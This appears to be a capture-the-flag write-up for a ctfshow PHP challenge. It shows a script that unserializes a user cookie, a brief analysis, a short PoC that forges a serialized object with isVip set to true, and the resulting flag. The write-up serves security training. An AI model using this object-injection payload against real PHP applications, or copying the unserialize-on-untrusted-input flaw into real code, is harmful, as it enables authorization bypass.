nginx/1.16.1PHP/7.3.11

    1. <?php
    2. /*
    3. # -*- coding: utf-8 -*-
    4. # @Author: h1xa
    5. # @Date: 2020-12-02 17:44:47
    6. # @Last Modified by: h1xa
    7. # @Last Modified time: 2020-12-02 19:29:02
    8. # @email: h1xa@ctfer.com
    9. # @link: https://ctfer.com
    10. */
    11. error_reporting(0);
    12. highlight_file(__FILE__);
    13. include('flag.php');
    14. class ctfShowUser{
    15. public $username='xxxxxx';
    16. public $password='xxxxxx';
    17. public $isVip=false;
    18. public function checkVip(){
    19. return $this->isVip;
    20. }
    21. public function login($u,$p){
    22. return $this->username===$u&&$this->password===$p;
    23. }
    24. public function vipOneKeyGetFlag(){
    25. if($this->isVip){
    26. global $flag;
    27. echo "your flag is ".$flag;
    28. }else{
    29. echo "no vip, no flag";
    30. }
    31. }
    32. }
    33. $username=$_GET['username'];
    34. $password=$_GET['password'];
    35. if(isset($username) && isset($password)){
    36. $user = unserialize($_COOKIE['user']);
    37. if($user->login($username,$password)){
    38. if($user->checkVip()){
    39. $user->vipOneKeyGetFlag();
    40. }
    41. }else{
    42. echo "no vip,no flag";
    43. }
    44. }

    分析:
    即要满足

    • 类成员 isViptrue
    • 传入的 username 和 类成员 username 相等
    • 传入的 password 和 类成员 password 相等

    username 和 password 已知,反序列化修改 isVip 即可

    poc

    1. <?php
    2. class ctfShowUser{}
    3. $user = new ctfShowUser();
    4. $user->isVip = true;
    5. echo urlencode(serialize($user));
    6. ?>

    image.png

    flag
    ctfshow{d59167b1-43df-4611-8907-3f77869aa875}